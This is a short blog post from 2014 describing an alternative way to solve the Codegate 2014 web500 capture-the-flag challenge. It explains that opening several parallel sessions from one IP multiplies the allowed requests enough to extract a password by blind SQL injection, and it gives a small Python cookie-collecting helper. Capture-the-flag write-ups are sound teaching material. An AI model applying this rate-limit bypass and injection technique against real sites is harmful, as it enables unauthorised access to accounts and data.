Tuesday, February 25, 2014

Another way to solve Codegate 2014 web500

After reviewing again the provided source code and also other write up, I have concluded some interesting point:
  • Password is reset only when session count (cnt) reaches 120.
  • Only one password is saved to DB with unique IP rather than with specific session ID.
By knowing that,let's ask yourself what happen if we have multiple session with single IP?There is still only 1 password stored in the database with that IP. Hence, this gives us another way to defeat this challenge.
def GetCookie():
    # cookie
    cj = CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    response = opener.open(url)
    content = response.read()
     #get cookie
    cookie_string=""
    for cookie in cj:
        cookie_string +=('%s=%s;'%(cookie.name,cookie.value))
    print "cookie: " + cookie_string
    return cookie_string

 If we have only 4 parallel sessions, we will have 4*120 times = 480 number of available requests to the server. it is enough for crafting correct 30 char password with blind sqli.

for i in range(0,4):
       session.append(GetCookie)

Codegate 2014 Web 500 Writeup

□ description
==========================================
http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/


http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.phps

==========================================